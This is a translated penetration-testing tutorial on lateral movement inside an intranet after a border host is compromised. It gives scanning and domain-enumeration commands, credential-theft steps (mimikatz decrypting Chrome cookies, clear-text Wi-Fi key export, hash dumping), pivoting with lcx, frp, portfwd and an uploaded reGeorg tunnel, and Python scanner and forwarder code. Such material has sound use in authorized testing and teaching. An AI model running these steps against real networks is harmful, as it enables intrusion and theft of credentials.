
Title: General methods of penetration after the border proxy host is used to reach the third layer of the intranet


From the external network, the first shell on a boundary host is usually obtained through a web vulnerability; the same is true for the next hop inside the intranet.

A large part of intranet information collection revolves around the network topology diagram. It can often be obtained by social-engineering the operations and maintenance staff, or simply by searching Google.

Intranet spreading: information collection

Overview

Intranet information collection covers: the intranet network and terminal information (topology, segmentation); the core business systems (OA system, mail server, monitoring system); and information from the other Windows and Linux hosts. The better the intranet information collection, the faster the lateral movement.

Common method: active scanning. Commonly used tools for working out the intranet topology and for finding common ports and services: nmap, netdiscover, nc, masscan and self-written scripts. Start by collecting local information on the foothold host, for example which segments exist (DMZ, test network and so on). Note that nmap generates a lot of traffic: because it uses many scanning techniques its accuracy is high, but so is its traffic volume, so it is better suited to scanning from the external network.

Active scanning leaves many traces and is easy to notice; passive scanning takes a long time. Choose according to the situation.

Generally, scan port 80 and the other web ports first: external websites may be well hardened, but intranet websites are often poor, with web vulnerabilities such as SQL injection and XSS one after another.

Active scanning

ping: scan for live hosts in the intranet. Advantages: convenient, and it generally does not trigger alarms on traffic-detection devices. Disadvantages: slow, and if the target has a firewall enabled the result will be inaccurate.

nmap live-host scan (ICMP):
nmap -sn -PE -n -v -oN 1.txt <target IP/range>
Parameters: -sn no port scan; -PE ICMP echo request; -n no reverse DNS resolution; -v verbose output; -oN write normal output to the given file.

nmap live-host scan (ARP):
nmap -sn -PR -n -v <target IP/range>
-PR means ARP ping; inside the same layer-2 segment ARP scanning is the fastest and the most accurate.

netdiscover (an ARP scanning tool that can scan actively or sniff passively):
netdiscover -i eth0 -r <target range>
-i specifies the interface; -r specifies the scan range. Note: the longer netdiscover runs, the more accurate it becomes; over time you can see that a host has talked to other network segments, and thereby discover new segment addresses.

nbtscan quickly scans for live Windows terminals and at the same time obtains NetBIOS names (the Windows name service on port 139):
nbtscan -r <target range>

Port and Service Scan

Detect the target's open ports.
nmap: nmap -Pn -n <target IP> (-Pn skips host discovery, i.e. the ping is disabled)
masscan: masscan -p <ports> <target IP> --rate=10000 (scan the ports at 10 kpps)

Detect the target operating system with an NSE script:
nmap --script smb-os-discovery.nse -p 445 <target IP>
smb-os-discovery.nse uses SMB to obtain the OS version, computer name, workgroup name, domain name and so on; --script specifies the script.

Use nmap -O to detect the operating system version: nmap -O <target IP>

Scan the host for known CVE vulnerabilities: nmap --script=vuln <target IP>
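As an added example that is not part of the original post: a minimal TCP connect scanner in Python of the kind meant by "self-written scripts" above. It demonstrates the trade-off described here: a full three-way handshake per port needs no raw sockets or root, but every probe shows up on the target, and the worker count is the knob between speed and noise. The test bed (one listening port and one closed port on 127.0.0.1) is constructed inside demo() so it runs offline; the host, port list, timeout and worker count are assumptions.

```python
import socket
from concurrent.futures import ThreadPoolExecutor


def probe(host, port, timeout=0.5):
    """Return True when a full TCP handshake to host:port completes (port open).
    A refused, timed-out or unreachable connect counts as closed/filtered."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return True
        except OSError:          # ConnectionRefusedError, socket.timeout, network errors
            return False


def tcp_connect_scan(host, ports, timeout=0.5, workers=32):
    """Connect-scan the given ports with a bounded thread pool; return open ports sorted.
    Every probe is a complete handshake that the target can log: lower 'workers'
    when staying quiet matters more than speed."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, probe(host, p, timeout)), ports))
    return sorted(p for p, is_open in results if is_open)


def demo():
    """Constructed test bed on loopback: one listening port (open) and one port
    that was bound and then released (closed). Returns (open_port, closed_port, found)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]

    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))          # distinct from open_port, which is still bound
    closed_port = spare.getsockname()[1]
    spare.close()

    try:
        found = tcp_connect_scan("127.0.0.1", [open_port, closed_port], timeout=1.0)
    finally:
        listener.close()
    return open_port, closed_port, found


if __name__ == "__main__":
    open_port, closed_port, found = demo()
    print(f"open={open_port} closed={closed_port} scan found {found}")
```

Against a real target, replace the loopback test bed with the host and the port list you want (for example the web, RDP and SMB ports first, as the text suggests) and keep the timeout short: with -Pn-style scanning of filtered hosts, the timeout is what dominates total scan time.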

Common commands for intranet

Command and description:
net user: list the local users
net view: list the machines in the same domain or workgroup
net localgroup administrators: view the local administrators
net user /domain: list the domain users
net group /domain: list the groups in the domain
net group "domain admins" /domain: list the Domain Admins group
net localgroup administrators /domain: view the Administrators group on the domain controller
net localgroup administrators domain\user /add: add a domain user to the local Administrators group
net group "domain controllers" /domain: list the domain controllers
/domain is the parameter used for domain queries. The domain administrator is the high-privilege account; once it is taken, the server that controls the entire domain, the domain controller, is under your control.

dsquery domain commands (domain penetration will be written up later). dsquery command, net equivalent and function:
dsquery computer domainroot -limit 65535 / net group "domain computers" /domain: list all machine names in the domain
dsquery user domainroot -limit 65535 / net user /domain: list all user names in the domain
dsquery subnet: list the subnet divisions
dsquery group / net group /domain: list the groups in the domain
dsquery ou: list the organizational units in the domain
dsquery server / net time /domain: list the domain controllers

Windows host information collection

This is the information collection performed after the highest privileges on the host have been obtained.

Mainly collected: system administrator passwords (hash and plaintext); sessions of other users; 3389 (RDP) and IPC connection records; each user's browser passwords and cookies; recycle-bin contents; Windows wireless passwords; database passwords; the hosts file and DNS cache; antivirus software, patches, processes and network proxy settings; shared folders; web server configuration files; scheduled tasks; the account password policy and lockout policy.

Windows: collecting the various pieces of information

Tools: mimikatz, wce, getpass, QuarksPwDump, reg save (to export the SAM/SYSTEM hives), pwdump7 and others.

cmdkey stores saved user-name and password credentials: cmdkey /list shows which credentials exist; netpass.exe retrieves the passwords.

Recycle bin: cd C:\$Recycle.Bin (a hidden folder; list it with dir /ah, where attribute h means hidden).

Wireless passwords: netsh wlan export profile interface=WLAN key=clear folder=C:\

Browser cookies and saved passwords (Chrome):
%localappdata%\Google\Chrome\User Data\Default\Cookies
%localappdata%\Google\Chrome\User Data\Default\Login Data
Chrome keeps this user information in local SQLite databases, with the sensitive values DPAPI-protected (Chrome 80 and later wrap them with an AES key kept in the Local State file, which the same mimikatz module also handles). Use mimikatz to read the contents:
mimikatz.exe privilege::debug "dpapi::chrome /in:%localappdata%\Google\Chrome\User Data\Default\Cookies /unprotect"

Windows information collection under msf

Modules used:
post/windows/gather/forensics/enum_drives: disk partition layout of the target host
post/windows/gather/checkvm: determine whether the target is a virtual machine
post/windows/gather/enum_services: view the enabled services
post/windows/gather/enum_applications: view the installed applications
post/windows/gather/enum_shares: view the shares
post/windows/gather/dumplinks: view the recent activity of the target host (recent-file links)
post/windows/gather/enum_patches: view the patch information
scraper: exports many pieces of information at once
Load a module with use (or run it directly with run), set the parameters, then exploit.

linux information collection

There is much less to collect on Linux than on Windows.

history displays the previously executed commands; by default it shows the last 1,000 commands of the current user on this machine (the limit is the HISTSIZE variable, which can be customised in /etc/profile). history -c clears all command history of the current shell. Each user has a separate history.

last shows the recent login records of the system; it reads /var/log/wtmp. Columns: user name, terminal, login IP (or kernel version for reboot entries), start time, end time. Privilege escalation through a system vulnerability is not a login, so it leaves no record here.

arp -vn shows the ARP cache; check whether there are entries outside the expected segment. A MAC address should map to a fixed IP; if the MAC-to-IP mappings do not match, ARP spoofing may be in progress.

/etc/hosts stores the domain-name/host-name to IP mappings.
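Added example (not from the original post): since last only reads /var/log/wtmp, the same records can be parsed directly with Python's struct module, which is useful when last is missing or the file is suspected to have been edited. The record layout is the glibc utmp structure on 64-bit Linux (384 bytes per entry); the sample bytes are constructed in the code with pack_utmp, and the user names, addresses and timestamps in them are made up.

```python
import socket
import struct
from datetime import datetime, timezone

# glibc struct utmp on 64-bit Linux, 384 bytes: ut_type, 2 pad bytes, ut_pid,
# ut_line[32], ut_id[4], ut_user[32], ut_host[256], exit_status (2 shorts),
# ut_session, ut_tv (tv_sec, tv_usec as int32), ut_addr_v6[4], 20 unused bytes.
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)      # 384

UT_TYPES = {0: "EMPTY", 1: "RUN_LVL", 2: "BOOT_TIME", 5: "INIT_PROCESS",
            6: "LOGIN_PROCESS", 7: "USER_PROCESS", 8: "DEAD_PROCESS"}


def _cstr(raw):
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def pack_utmp(ut_type, pid, line, user, host, ts, ipv4=None):
    """Build one record; used here only to construct sample data."""
    addr = [0, 0, 0, 0]
    if ipv4:
        addr[0] = struct.unpack("<i", socket.inet_aton(ipv4))[0]
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, ts, 0, *addr)


def parse_wtmp(data):
    """Parse the raw bytes of /var/log/wtmp into a list of dicts, oldest first."""
    records = []
    for off in range(0, len(data) - UTMP_SIZE + 1, UTMP_SIZE):
        (ut_type, pid, line, _id, user, host, _term, _exit, _sess,
         sec, _usec, a0, a1, a2, a3) = struct.unpack_from(UTMP_FMT, data, off)
        # IPv4 addresses occupy only the first word; IPv6 entries are left as None here
        ip = socket.inet_ntoa(struct.pack("<i", a0)) if a0 and not (a1 or a2 or a3) else None
        records.append({"type": UT_TYPES.get(ut_type, str(ut_type)), "pid": pid,
                        "line": _cstr(line), "user": _cstr(user), "host": _cstr(host),
                        "ip": ip, "time": datetime.fromtimestamp(sec, tz=timezone.utc)})
    return records


def login_sessions(records):
    """Pair each USER_PROCESS with the next DEAD_PROCESS on the same tty, as last does.
    A session whose end is None is 'still logged in'. Root obtained through a local
    exploit never passes through login, so it leaves no USER_PROCESS record at all."""
    open_by_line, sessions = {}, []
    for r in records:
        if r["type"] == "USER_PROCESS":
            s = {"user": r["user"], "line": r["line"], "host": r["host"], "ip": r["ip"],
                 "start": r["time"], "end": None, "duration": None}
            open_by_line[r["line"]] = s
            sessions.append(s)
        elif r["type"] == "DEAD_PROCESS" and r["line"] in open_by_line:
            s = open_by_line.pop(r["line"])
            s["end"] = r["time"]
            s["duration"] = int((s["end"] - s["start"]).total_seconds())
    return sessions


# Constructed sample: a boot, a root SSH session from 10.0.0.5 that lasted an hour,
# and an alice session on pts/1 that is still open. Names and addresses are made up.
SAMPLE_WTMP = b"".join([
    pack_utmp(2, 0, "~", "reboot", "5.15.0-generic", 1667000000),
    pack_utmp(7, 4242, "pts/0", "root", "10.0.0.5", 1667000100, ipv4="10.0.0.5"),
    pack_utmp(8, 4242, "pts/0", "", "", 1667003700),
    pack_utmp(7, 5151, "pts/1", "alice", "10.0.0.9", 1667004000, ipv4="10.0.0.9"),
])


if __name__ == "__main__":
    for s in login_sessions(parse_wtmp(SAMPLE_WTMP)):
        end = s["end"].isoformat() if s["end"] else "still logged in"
        print(f'{s["user"]:8} {s["line"]:6} {s["host"]:15} {s["start"].isoformat()} {end}')
```

On a real host read the bytes with open("/var/log/wtmp", "rb").read() and pass them to parse_wtmp; /var/log/btmp (failed logins, shown by lastb) has the same record format. If the record count does not match what last prints, or the file size is not a multiple of 384, the file has been truncated or edited.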

Linux Collection under msf

Modules used:
post/linux/gather/checkvm: determine whether the target is a virtual machine
post/linux/gather/enum_configs: view the configuration files
post/linux/gather/enum_network: view the network information
post/linux/gather/enum_protections: enumerate the installed security protections (antivirus, firewall and similar)
post/linux/gather/enum_system: view the system and user information
post/linux/gather/enum_users_history: view the recent activity of the users on the target
post/linux/gather/hashdump: obtain the Linux password hashes
I still want to emphasise that passive collection matters: in the intranet, passive collection is much safer, but its cycle is very long. Every bit of initiative is a bit of danger.

Summary of collection content

Network card information, ARP cache, routing table, website configuration files, databases, access logs, browser history, netstat output, hosts file, shell history, hashes, plaintext passwords, account passwords in website configuration, Wi-Fi passwords, cmdkey credentials.

Intranet forwarding

The purpose of intranet forwarding. In theory, all computers connected to the network can reach each other, but in practice they cannot, for technical reasons (NAT and firewalls). If a computer in a LAN only runs a web service, that service is reachable inside the intranet only and cannot be accessed directly from the external network. To let external users reach LAN services, intranet forwarding and similar operations are required.

Intranet forwarding principle

Traffic is relayed through a server: either the internal port is mapped onto a public IP, or the internal port is forwarded to an external server. There are three forms: port forwarding, port mapping and proxy forwarding. Port forwarding is used when the target machine restricts access to a certain port: the port of the local machine, or of any host the local machine can reach, is forwarded to any public IP you can access.

Port mapping maps a port that cannot be reached from outside the intranet onto a port on the public network, so that it can be attacked. For example: port 3389.

Proxy forwarding mainly turns the target machine into a springboard, from which the intranet can then be attacked.

Four basic network situations: (1) the attacker has an independent public IP and the server on which the shell was obtained also has an independent public IP; (2) the attacker has an independent public IP, while the shelled server is in an intranet with only a few mapped ports; (3) the attacker is in an intranet and the server has an independent public IP; (4) the attacker is in an intranet and the server is in an intranet with only a few mapped ports. Each of the four situations calls for a different way of reaching the server.

Port Forwarding

Principle

Port forwarding is the act of forwarding a network port from one network node to another. It lets an external user reach a port on a private internal IP address (inside the LAN) through an active NAT router.

Simply put: port forwarding forwards a port (the local machine's own port, or a port on any host the local machine can reach) to any reachable IP, usually a public IP. Port forwarding scenario:

External host A can already connect to a port on intranet host B at any time, but cannot reach the port on intranet host C.

Forward C's port to a port on B. External host A then connects to that port on B, which is equivalent to connecting to the port on C.

Port Forwarding Tool

lcx

lcx is a socket-based port forwarding tool. It has a Windows and a Linux version: the Windows one is lcx.exe and the Linux one is called portmap.

A normal socket tunnel must have two ends: a server and a client.

Windows:

Forward a port: lcx.exe -slave <public IP> <port> <intranet IP> <port>
Listen: lcx.exe -listen <forwarding port> <unoccupied local port>
Local port mapping: lcx.exe -tran <mapped port> <target IP> <target port>. If the target server is restricted by a firewall that blocks the traffic of some ports, the traffic of a blocked port can be carried over another port the firewall allows.
Intranet port forwarding: when the attacking host cannot reach the intranet directly, the web server is used as a springboard, that is, as a proxy, so that the attacking machine can reach the intranet hosts.

Basic commands:

Forward a port: lcx.exe -slave <public IP> <port> <intranet IP> <port>

Listen: lcx.exe -listen <forwarding port> <unoccupied local port>

Windows port forwarding example

Environment: the intranet host cannot reach the external network but can reach machines on the same segment. Its port 80 is only accessible locally, while port 8080 is open to the outside.

Step 1: on the controlled server, forward port 80 to local port 8080: lcx -tran 8080 127.0.0.1 80

Step 2: on the controlled server, connect to the intranet machine that is reachable from the outside: lcx -slave 192.168.56.1 4444 192.168.56.101 8080

Step 3: on the intranet machine that is reachable from the outside, listen: lcx -listen 4444 12345

Step 4: the external machine connects to 192.168.56.1:12345. The chain is: external machine -> 192.168.56.1:12345 (lcx -listen) -> port 4444 -> 192.168.56.101:8080 (lcx -slave) -> 127.0.0.1:80 on the controlled server.
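Added example, not from the original post: the lcx -tran behaviour (listen on one port, bridge every accepted connection to a target) written in Python, chained twice to reproduce the multi-hop path of the steps above. The echo server standing in for port 80, the loopback addresses and the ephemeral ports are assumptions so that it runs offline; a real use would take the listen port and the target IP and port from the command line.

```python
import socket
import threading


def _pipe(src, dst):
    """Copy bytes src -> dst until EOF, then close dst's write side so the peer
    sees the EOF too; this is what lets every hop in a chain finish cleanly."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay(a, b):
    """Bridge two connected sockets in both directions, then close both."""
    t = threading.Thread(target=_pipe, args=(a, b), daemon=True)
    t.start()
    _pipe(b, a)
    t.join()
    a.close()
    b.close()


class _Listener:
    """Accept loop with a timeout so stop() can interrupt it."""

    def __init__(self, host, port):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(16)
        self.sock.settimeout(0.2)
        self.port = self.sock.getsockname()[1]
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._serve, daemon=True)

    def start(self):
        self._thread.start()
        return self

    def _serve(self):
        while not self._stop.is_set():
            try:
                conn, _ = self.sock.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            threading.Thread(target=self.handle, args=(conn,), daemon=True).start()

    def stop(self):
        self._stop.set()
        self._thread.join()
        self.sock.close()


class PortForwarder(_Listener):
    """Equivalent of `lcx -tran <listen_port> <target_ip> <target_port>`: every
    connection accepted on listen_port is bridged to target_host:target_port."""

    def __init__(self, listen_host, listen_port, target_host, target_port):
        super().__init__(listen_host, listen_port)
        self.target = (target_host, target_port)

    def handle(self, client):
        try:
            upstream = socket.create_connection(self.target, timeout=3)
            upstream.settimeout(None)
        except OSError:
            client.close()                 # target unreachable: drop the client
            return
        relay(client, upstream)


class EchoServer(_Listener):
    """Stand-in for the intranet web server on port 80: echoes what it receives."""

    def handle(self, conn):
        _pipe(conn, conn)
        conn.close()


def demo(payload=b"GET / HTTP/1.0\r\n\r\n"):
    """Two chained forwarders in front of the echo server, like
    external -> 12345 -> 4444 -> 8080 -> 80 above. Returns the bytes that came back."""
    echo = EchoServer("127.0.0.1", 0).start()
    hop1 = PortForwarder("127.0.0.1", 0, "127.0.0.1", echo.port).start()
    hop2 = PortForwarder("127.0.0.1", 0, "127.0.0.1", hop1.port).start()
    try:
        with socket.create_connection(("127.0.0.1", hop2.port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)
            out = b""
            while True:
                chunk = c.recv(4096)
                if not chunk:
                    break
                out += chunk
    finally:
        hop2.stop()
        hop1.stop()
        echo.stop()
    return out


if __name__ == "__main__":
    print(demo())
```

Note that the forwarder carries raw bytes and knows nothing about what it relays, which is exactly the one-port, one-target limitation the proxy section below contrasts it with: reaching another intranet port means another forwarder.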

Linux:

Usage: ./portmap -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]

-v: version

-m: specifies the method (action) parameter

method=1: listen on port1 and connect to host2:port2 (port map)

method=2: listen on port1 and port2 and bridge them (port listen)

method=3: connect to host1:port1 and host2:port2 (port forwarding)

For example: ./portmap -m 2 -p1 6666 -h2 <public IP> -p2 7777 // listen on port 6666 and forward to port 7777

frp

FRP (fast reverse proxy) is a reverse proxy application written in Go that can be used for intranet penetration. frp supports tcp, udp, http and https.

Using a machine located inside the intranet or behind a firewall, it exposes http, https, tcp and udp services to the external network. For http and https it supports domain-name based virtual hosts and custom domain names, so several domain names can share port 80. In the download, frps and frps.ini are the server program and its configuration file; frpc and frpc.ini are the client program and its configuration file.

Server settings: modify frps.ini

File format:

[common]
# port frps listens on
bind_port = 7000
# web dashboard listening port
dashboard_port = 7500
# web dashboard username and password
dashboard_user = admin
dashboard_pwd = admin
# shared secret between the client and the server
token = 123456

Change the dashboard credentials and the token before running the server on a public IP; anyone who knows the token can register tunnels through your frps.

Run the server: ./frps -c frps.ini (-c means load the configuration file)

Visit x.x.x.x:7500 and log in with your own username and password

Client settings: modify frpc.ini

[common]
# server IP address
server_addr = 192.168.152.217
# server port
server_port = 7000
# the token set on the server
token = 123456

# a custom rule; [xxx] is the rule name
[http]
# forwarding protocol type
type = tcp
local_ip = 127.0.0.1
# port of the local application
local_port = 3389
# port the server opens for this rule
remote_port = 7001

After frpc.ini is complete, run frpc from cmd (as with the server, -c specifies the configuration file).

From a client outside the LAN, connect to the server's remote_port.

The tool is cross-platform: a Windows exe client can connect to a Linux server.

The above is equivalent to: the client connects to the server on port 7000, the server listens on 7001, and a connection to 7001 reaches the client's 127.0.0.1:3389.

metasploit portfwd

Introduction

A command built into the meterpreter shell for reaching machines that the attacking system cannot access directly. Run it in a session on a compromised host that can reach both the attacking machine and the target; TCP connections are forwarded through that host, which becomes the pivot. Options:

-L: the local host to listen on (optional).

-l: the local port to listen on; connections to this port are forwarded to the remote system.

-p: the remote port to which the TCP connection is forwarded.

-r: the IP address of the remote host to connect to.

Parameters

Add: creates a forward. portfwd add -l <local listening port> -p <target port> -r <target IP>

Delete: removes an entry from the forwarding list. portfwd delete -l <local listening port> -p <target port> -r <target IP>

List: lists all ports currently forwarded. portfwd list

Flush: removes all entries from the forwarding list. portfwd flush

This is not very stable and not as good as frp; lcx is not very useful either.

Proxy categories: HTTP proxy, SOCKS proxy, telnet proxy, SSL proxy.

Proxy tools: EarthWorm, reGeorg (HTTP tunnel), Proxifier (Windows), SocksCap64 (Windows), proxychains (Linux).

Intranet clients reaching the external network through a proxy is a forward proxy; the external network reaching intranet services through a proxy is a reverse proxy.

Load balancing server: distributes user requests to an idle server.

socks proxy

When accessing a website through a SOCKS proxy, the SOCKS server acts as the intermediary: it talks to each party separately and relays the result to the other. Once the SOCKS proxy is configured, the client does not need to specify a single target in advance.

SOCKS and HTTP proxies carry TCP traffic, so in practice UDP cannot go through either kind of proxy (SOCKS5 does define UDP ASSOCIATE, but the tools used in pentesting rarely implement it). Proxy versus port forwarding: port forwarding is one-to-one, it helps you reach one specific port, whereas a SOCKS proxy is one-to-many and requires the SOCKS protocol. A SOCKS proxy can be understood as a generalised lcx: it listens on a service port on the server, and when a connection request arrives it parses the target address and port out of the SOCKS protocol and connects there.
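Added example (not part of the original post) of the parsing step mentioned above: the server side of a SOCKS5 handshake as pure functions, which turn the client's greeting and CONNECT request bytes into the target host and port plus the reply bytes, and refuse BIND and UDP ASSOCIATE the way TCP-only pentest proxies do. The constructed client messages (a 10.10.1.5:3389 CONNECT, a domain-name CONNECT and a UDP ASSOCIATE) are made up for the demonstration.

```python
import socket
import struct

SOCKS_VER = 0x05
NO_AUTH, NO_ACCEPTABLE = 0x00, 0xFF
CMD_CONNECT, CMD_BIND, CMD_UDP_ASSOCIATE = 0x01, 0x02, 0x03
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REP_SUCCESS, REP_FAILURE, REP_CMD_NOT_SUPPORTED, REP_ATYP_NOT_SUPPORTED = 0x00, 0x01, 0x07, 0x08


class SocksError(ValueError):
    def __init__(self, msg, rep=REP_FAILURE):
        super().__init__(msg)
        self.rep = rep                      # reply code to send before closing


def handle_greeting(data):
    """Client greeting: VER NMETHODS METHODS...  -> server method selection (2 bytes)."""
    if len(data) < 2 or data[0] != SOCKS_VER:
        raise SocksError("not a SOCKS5 greeting")
    methods = data[2:2 + data[1]]
    if len(methods) != data[1]:
        raise SocksError("truncated method list")
    chosen = NO_AUTH if NO_AUTH in methods else NO_ACCEPTABLE
    return bytes([SOCKS_VER, chosen])


def parse_request(data):
    """Client request: VER CMD RSV ATYP DST.ADDR DST.PORT -> (cmd, host, port).
    This is the step where the proxy learns the target from the protocol itself."""
    if len(data) < 4 or data[0] != SOCKS_VER:
        raise SocksError("not a SOCKS5 request")
    cmd, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        addr_len = 4
    elif atyp == ATYP_DOMAIN:
        if len(data) < 5:
            raise SocksError("truncated request")
        addr_len = 1 + data[4]              # length byte followed by the name
    elif atyp == ATYP_IPV6:
        addr_len = 16
    else:
        raise SocksError("unknown address type", REP_ATYP_NOT_SUPPORTED)
    if len(data) < 4 + addr_len + 2:
        raise SocksError("truncated request")
    raw = data[4:4 + addr_len]
    if atyp == ATYP_IPV4:
        host = socket.inet_ntop(socket.AF_INET, raw)
    elif atyp == ATYP_DOMAIN:
        host = raw[1:].decode("ascii", "replace")
    else:
        host = socket.inet_ntop(socket.AF_INET6, raw)
    (port,) = struct.unpack("!H", data[4 + addr_len:4 + addr_len + 2])
    return cmd, host, port


def build_reply(rep, bind_host="0.0.0.0", bind_port=0):
    """Server reply: VER REP RSV ATYP BND.ADDR BND.PORT (IPv4 form)."""
    return (bytes([SOCKS_VER, rep, 0x00, ATYP_IPV4])
            + socket.inet_aton(bind_host) + struct.pack("!H", bind_port))


def handle_request(data):
    """Decide what to do with one request. Returns (target, reply_bytes): target is
    (host, port) for an accepted CONNECT and None when the request is refused.
    Like reGeorg and proxychains, only CONNECT is served; BIND and UDP ASSOCIATE get 0x07.
    A real proxy connects to the target first and only then sends REP_SUCCESS."""
    try:
        cmd, host, port = parse_request(data)
    except SocksError as e:
        return None, build_reply(e.rep)
    if cmd != CMD_CONNECT:
        return None, build_reply(REP_CMD_NOT_SUPPORTED)
    return (host, port), build_reply(REP_SUCCESS)


# Constructed client messages for the demonstration (addresses are made up).
GREETING = b"\x05\x01\x00"
CONNECT_IPV4 = b"\x05\x01\x00\x01" + socket.inet_aton("10.10.1.5") + struct.pack("!H", 3389)
CONNECT_DOMAIN = b"\x05\x01\x00\x03" + bytes([10]) + b"oa.corp.lo" + struct.pack("!H", 80)
UDP_ASSOCIATE = b"\x05\x03\x00\x01" + b"\x00\x00\x00\x00" + b"\x00\x00"


if __name__ == "__main__":
    print(handle_greeting(GREETING).hex())
    for msg in (CONNECT_IPV4, CONNECT_DOMAIN, UDP_ASSOCIATE):
        target, reply = handle_request(msg)
        print(target, reply.hex())
```

The domain-name address type is what makes "no need to specify the target in advance" work: the proxy resolves oa.corp.lo from inside the intranet, which is also why proxychains has the proxy_dns option to stop your own machine from leaking DNS queries for internal names.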

In other words: once you have a proxy there is no need for port forwarding at all. Chaining forwarded ports back and forth only makes your head spin; a proxy needs none of those tricks.

proxychains

proxychains is an open-source tool for proxying any program globally on Linux. It forces the connections of the specified application through a user-defined proxy list and supports the http, socks4 and socks5 types. It must be configured before use; the configuration file is /etc/proxychains.conf.

Uncomment dynamic_chain.

Add the proxy server to the [ProxyList] at the bottom, one per line in the form "socks5 127.0.0.1 1080". Then start any program through the proxy with: proxychains <program name>.

regeorg tool

reGeorg forwards intranet server ports to the local machine through an HTTP/HTTPS tunnel: the target web server makes the connections to the intranet on your behalf, so even when a port policy blocks direct access, the one port that is open on the target (the web port) is used to build a SOCKS proxy for intranet penetration. The server must be able to run an aspx, php or jsp page. reGeorg is divided into a server side and a client side: there are several server scripts (php, aspx, jsp, node.js and so on) and the client is a Python script, so pick the script matching the target from the package.

regeorg use

Use it together with proxychains.

Install the dependencies with pip. Assuming the server is PHP: upload the php tunnel script from reGeorg to the server and open it directly in the browser; it should answer "Georg says, 'All seems fine'". Then run: python reGeorgSocksProxy.py -u <URL of the reGeorg script on the target> -p <local listening port>. In another terminal edit proxychains.conf: uncomment dynamic_chain, add the line "socks5 127.0.0.1 <local listening port>" to the ProxyList, and comment out the other entries.
